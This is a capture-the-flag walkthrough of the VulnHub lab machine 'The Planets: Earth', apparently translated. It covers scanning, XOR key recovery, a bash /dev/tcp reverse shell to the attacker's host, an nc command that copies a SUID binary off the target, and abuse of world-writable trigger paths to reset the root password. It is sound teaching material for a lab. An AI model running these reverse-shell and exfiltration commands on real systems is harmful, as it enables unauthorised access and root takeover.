
vulnhub walkthrough notes (The Planets: Earth)

Author: ailx10
  • English name: The Planets: Earth
  • Chinese name: 行星:地球
  • Release date: 2 November 2021
  • Difficulty: easy
  • Description: Earth is an easy box, though you may find it more challenging than "Mercury" in this series, and on the harder side of easy depending on your experience. There are two flags on the box: a user flag and a root flag containing an md5 hash. It has been tested on VirtualBox, so it may not work correctly on VMware. For any questions, issues or feedback, email SirFlash at protonmail.com, though it may take me a while to get back to you.
  • Download: https://www.vulnhub.com/entry/the-planets-earth,755/

1. Discover the target's IP address; one suspicious host is found

  • earth.lan (192.168.199.179)
└─$ nmap -sP 192.168.199.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:21 CST
Nmap scan report for Hiwifi.lan (192.168.199.1)
Host is up (0.0027s latency).
Nmap scan report for 192.168.199.114
Host is up (0.0037s latency).
Nmap scan report for N3NXCV065297107.lan (192.168.199.151)
Host is up (0.0092s latency).
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.0020s latency).
Nmap scan report for kali.lan (192.168.199.247)
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds            

2. Port-scan the address: ports 22, 80 and 443 are open

$ nmap -A 192.168.199.179        
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:28 CST
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.61s latency).
Not shown: 933 filtered tcp ports (no-response), 64 filtered tcp ports (host-unreach)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time           

3. Before brute-forcing the site's pages, the hosts file needs to be configured with the names from the certificate

192.168.199.179 terratest.earth.local
192.168.199.179 earth.local           

4. Brute-force results: port 80 has a web admin portal, port 443 has the web home page and a robots file

---- Scanning URL: http://terratest.earth.local/ ----
+ http://terratest.earth.local/admin (CODE:301|SIZE:0)     

+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                  
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)              

5. Visit the web pages; robots.txt reveals a testingnotes.* path

(Screenshot: home page)

(Screenshot: admin portal)

(Screenshot: robots.txt)

6. Following the hint, open the testingnotes.txt page, which gives two clues

  • Key clue: testdata.txt
  • Username clue: terra

(Screenshot: clue page)

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

7. Follow the clues further

(Screenshot: clue page)

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

8. The home page shows three ciphertexts; using the hints above, the corresponding plaintexts need to be computed

(Screenshot: the three ciphertexts on the home page)

Previous Messages: 
    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a           

9. XOR-decode the three messages from the home page with testdata.txt; the third one yields the hint: earthclimatechangebad4humans

b'According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth\'s hisCfy //}omo;/ppeare\'2~d;\x7ff$\'x,\x7fjj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/j\x7fkr0~h<Pj1s.=\x06i\x97\xf3\xdcs-q,<j${ugn$u6&\x7f*+o\'erlj|mnn/?;-\'\x7f1%,f{kx8.`\x7fb)"\x8c\xe5\x99np`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-\x17skl)$In*\'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky\x7f8/k<\x0b6=+1\x80\xe8\xdaq*Ir8xo"P|7wfbn'
b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the prol^rrlj~<evy\x7f{&*xk|h$kaw-oc 0-'web146iqc$hte7af#`ec~)o>kFnkukzdt|a>y~ciyvb~jn$6O?0i~\x7fd|0v|$lx4~%5l3d*`mx6a8{vcketdia %e,{tr9x>q{1w$h&v~oaxx-)if4tv6pudk"
b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat'           

Decoding code for reference:

data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

# XOR key material: the raw bytes of testdata.txt downloaded from the clue page
key = open('testdata.txt', 'rb').read()

def xor_decode(hexstr, key):
    # Byte-wise XOR aligned from the first byte. Doing int(a, 16) ^ int(b, 16) instead
    # right-aligns the two values and drops leading 0x00 bytes, which garbles the output
    # whenever the lengths differ or the result starts with a zero byte.
    ct = bytes.fromhex(hexstr)
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(ct))  # key wraps if ct is longer

t1 = xor_decode(data1, key)
t2 = xor_decode(data2, key)
t3 = xor_decode(data3, key)  # prints the repeated key: earthclimatechangebad4humans
print(t1)
print(t2)
print(t3)
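The decoding above works because XOR with a known plaintext hands back the key stream. The following is an added example, not code from the page: it recovers the repeating key and its length from a single known plaintext, and shows why reusing that key across messages leaks the XOR of the plaintexts regardless of key length. The sample data is taken from this page (the first 64 bytes of the third ciphertext and the first 64 characters of the testdata.txt text quoted in step 7); the second message in the main block is constructed.

```python
# Known-plaintext analysis of repeating-key XOR (added example).
# Sample data from the page: first 64 bytes of the third home-page ciphertext and the
# first 64 characters of the testdata.txt text shown in step 7.
CT_PREFIX = bytes.fromhex(
    "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f1554"
    "0d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c"
)
PT_PREFIX = b"According to radiometric dating estimation and other evidence, E"


def xor_bytes(a, b):
    """XOR two byte strings position by position (truncates to the shorter one)."""
    return bytes(x ^ y for x, y in zip(a, b))


def smallest_period(stream):
    """Smallest p such that stream[i] == stream[i + p] everywhere; len(stream) if none."""
    n = len(stream)
    for p in range(1, n):
        if all(stream[i] == stream[i + p] for i in range(n - p)):
            return p
    return n


def recover_key(ciphertext, known_plaintext):
    """Key recovery from one known plaintext.

    ciphertext XOR plaintext is the key stream. With a repeating key that stream is
    the key written out over and over, so its smallest period is the key length.
    The known plaintext must span at least two repetitions for the period to be
    unambiguous; with less, only a prefix of the key is learned.
    """
    stream = xor_bytes(ciphertext, known_plaintext)
    return stream[:smallest_period(stream)]


def xor_with_key(data, key):
    """Encrypt or decrypt (same operation) under a repeating key."""
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(data))


def key_reuse_leak(ct_a, ct_b):
    """Two ciphertexts under the same key: XORing them cancels the key and leaves
    plaintext_a XOR plaintext_b, so the attacker no longer needs the key at all."""
    return xor_bytes(ct_a, ct_b)


if __name__ == "__main__":
    key = recover_key(CT_PREFIX, PT_PREFIX)
    print(len(key), key)  # 28 b'earthclimatechangebad4humans'
    # Constructed second message encrypted under the same key
    other_pt = b"monthly keys go out on the 1st"
    other_ct = xor_with_key(other_pt, key)
    # The key-free relation between the two plaintexts holds
    print(key_reuse_leak(CT_PREFIX, other_ct) == xor_bytes(PT_PREFIX, other_pt))  # True
```

The period search is what makes the "how long should the key be?" question in the testing notes moot: once one message's plaintext is known, any length of repeating key falls out of the XOR, and the key-reuse function shows that even an unknown key offers no protection for a second message.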

10. Log in to the test page with the username and password; it turns out to be a command-execution interface

(Screenshot: test admin page)

11. Get a reverse shell with nc

Attacker:
nc -lvnp 4444
Target:
bash -i >& /dev/tcp/3232286711/4444 0>&1           

Here 3232286711 is the attacker's IP address written as a single integer; reference code:

import socket

ip = "192.168.199.247"
# inet_aton returns the four address bytes in network (big-endian) order;
# reading them as a big-endian integer gives the dotted quad as one number
int_ip = int.from_bytes(socket.inet_aton(ip), "big")
print(int_ip)  # 3232286711

Shell obtained

(Screenshot: reverse shell obtained)

12. Search for the flag

find / -name "*flag*" 2>/dev/null           
(Screenshot: locating the flag file)

The flag's location:

/var/earth_web/user_flag.txt           

View the flag:

cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]           

13. Next, look for the root flag: list files with the SUID bit set

bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1           

Run /usr/bin/reset_root

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

14. Send the reset_root binary back to the local machine to trace its execution, using nc's file-transfer capability

Attacker:
└─# nc -lvp 5555 >reset_root
listening on [any] 5555 ...
connect to [192.168.199.247] from terratest.earth.local [192.168.199.179] 53332

Target:
bash-5.1$ nc 192.168.199.247 5555 < /usr/bin/reset_root
nc 192.168.199.247 5555 < /usr/bin/reset_root
           

15. Debugging locally shows that three paths are missing

  • /dev/shm/kHgTFI5G
  • /dev/shm/Zw7bV9U5
  • /tmp/kcM0Wewe
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root          
zsh: 权限不够: ./reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ls -hl reset_root 
-rw-r--r-- 1 root root 24K  8月 20 15:20 reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# chmod +x reset_root   
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root       
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace reset_root
strace: Can't stat 'reset_root': 没有那个文件或目录
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
brk(NULL)                               = 0x7bd000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (没有那个文件或目录)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 87631, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7b3a83000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0?\323\315\324#\241\204X\331\333:^P\242\263\300"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1904752, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a81000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1938296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7b38a7000
mprotect(0x7fe7b38cd000, 1724416, PROT_NONE) = 0
mmap(0x7fe7b38cd000, 1409024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fe7b38cd000
mmap(0x7fe7b3a25000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17e000) = 0x7fe7b3a25000
mmap(0x7fe7b3a72000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7fe7b3a72000
mmap(0x7fe7b3a78000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a78000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b38a5000
arch_prctl(ARCH_SET_FS, 0x7fe7b3a82580) = 0
mprotect(0x7fe7b3a72000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7fe7b3ac8000, 8192, PROT_READ) = 0
munmap(0x7fe7b3a83000, 87631)           = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x7bd000
brk(0x7de000)                           = 0x7de000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (没有那个文件或目录)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (没有那个文件或目录)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (没有那个文件或目录)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++           
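Reading the trace by eye works for a program this small; for a larger binary it helps to pull the path checks out mechanically. The following is an added example, not from the page: it extracts every ENOENT result from strace output, isolates the bare existence checks (access with F_OK), and flags those pointing into world-writable directories, which is the pattern that lets any local user satisfy reset_root's trigger checks. The sample trace lines are constructed here in the shape of the output above, using the three paths the page shows; the function and constant names are this example's own.

```python
import re

# Constructed sample in the shape of the strace output above (paths from the page).
# The first line keeps the Chinese locale message to show the parser does not rely on it.
SAMPLE_TRACE = """\
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (没有那个文件或目录)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/tmp/kcM0Wewe/config", O_RDONLY) = -1 ENOENT (No such file or directory)
exit_group(0)                           = ?
"""

# Path-taking syscalls whose first (or, after AT_FDCWD, second) argument is a quoted path.
# Matching keys on the "= -1 ENOENT" result, not on the locale-specific message after it.
ENOENT_RE = re.compile(
    r'^(?P<call>access|stat|lstat|open|openat|newfstatat|execve|readlink)'
    r'\((?:AT_FDCWD, )?"(?P<path>[^"]+)"(?P<args>[^)]*)\)\s*= -1 ENOENT'
)

# Directories any local user can create entries in (assumed list for this example)
WORLD_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def missing_paths(trace_text):
    """Return [(syscall, path, remaining argument text)] for every ENOENT result."""
    found = []
    for line in trace_text.splitlines():
        m = ENOENT_RE.match(line.strip())
        if m:
            found.append((m.group("call"), m.group("path"), m.group("args").strip(", ")))
    return found


def existence_probes(trace_text):
    """Only access(path, F_OK) checks: the program merely asks whether the path exists.
    That is the trigger-file pattern reset_root shows, as opposed to a real open()."""
    return [path for call, path, args in missing_paths(trace_text)
            if call == "access" and args == "F_OK"]


def user_controllable_probes(trace_text):
    """Existence probes under world-writable directories: a SUID program that changes
    behaviour on these is trusting a file any unprivileged user can create."""
    return [p for p in existence_probes(trace_text)
            if p.startswith(WORLD_WRITABLE_PREFIXES)]


if __name__ == "__main__":
    for call, path, args in missing_paths(SAMPLE_TRACE):
        print(f"{call:<8} {path:<28} {args}")
    print("existence probes:", existence_probes(SAMPLE_TRACE))
    print("user-controllable:", user_controllable_probes(SAMPLE_TRACE))
```

On a real run, `strace -e trace=file ./binary` limits the output to file-path syscalls, which keeps the trace close to what this parser expects. From the defender's side, the finding the third function surfaces is the actual bug in reset_root: a privileged program should keep its control files in a root-owned directory, not in /tmp or /dev/shm.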

So create those directories on the target:

bash-5.1$ mkdir dev/shm/kHgTFI5G
mkdir dev/shm/kHgTFI5G
bash-5.1$ mkdir /dev/shm/Zw7bV9U5
mkdir /dev/shm/Zw7bV9U5
bash-5.1$ mkdir /tmp/kcM0Wewe
mkdir /tmp/kcM0Wewe           

16. Try the root password reset again

/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth

Root password obtained: Earth

17. Switch to root and search for the flag again

su -u root           
(Screenshot: switched to root)

cat /root/root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
           

That completes the exercise.

Published 2022-08-20 15:39